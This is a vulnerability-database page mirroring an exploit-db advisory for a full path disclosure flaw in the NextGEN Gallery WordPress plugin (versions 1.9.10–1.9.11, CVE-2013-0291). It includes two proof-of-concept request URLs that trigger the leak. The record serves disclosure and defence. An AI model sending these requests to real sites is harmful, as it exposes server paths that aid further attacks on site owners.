Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbHenrique MontenegroEDB-ID:38314
HistoryFeb 14, 2013 - 12:00 a.m.

WordPress Plugin NextGEN Gallery - Full Path Disclosure

2013-02-1400:00:00
Henrique Montenegro
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

EPSS

0.403

Percentile

97.3%

JSON
source: https://www.securityfocus.com/bid/57957/info

The NextGEN Gallery plugin for WordPress is prone to a path-disclosure vulnerability. 

An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. 

NextGEN Gallery versions 1.9.10 and 1.9.11 are vulnerable; other versions may also be affected.

http://www.example.com/?callback=json&api_key=true&format=json&method=gallery&id=1 

http://www.example.com/?callback=json&api_key=true&format=xml&method=recent&limit=1

Related

patchstack 1
nvd 1
cve 1
openvas 1
wpvulndb 1
prion 1
cvelist 1
patchstack
patchstack
WordPress NextGEN Gallery Plugin - Path Disclosure Vulnerability
2013-02-14 00:00:00
nvd
nvd
CVE-2013-0291
2020-01-30 13:15:14
cve
cve
CVE-2013-0291
2020-01-30 13:15:14
openvas
openvas
WordPress NextGEN Gallery Plugin 1.9.10 < 2.0.0 Path Disclosure Vulnerability
2023-08-09 00:00:00
wpvulndb
wpvulndb
NextGEN Gallery 1.9.11 - Full Path Disclosure
2015-02-08 00:00:00
prion
prion
Path traversal
2020-01-30 13:15:00
cvelist
cvelist
CVE-2013-0291
2020-01-30 13:00:16

AI Score

7.4

Confidence

Low

EPSS

0.403

Percentile

97.3%

JSON
Related for EDB-ID:38314
patchstack1nvd1cve1openvas1wpvulndb1prion1cvelist1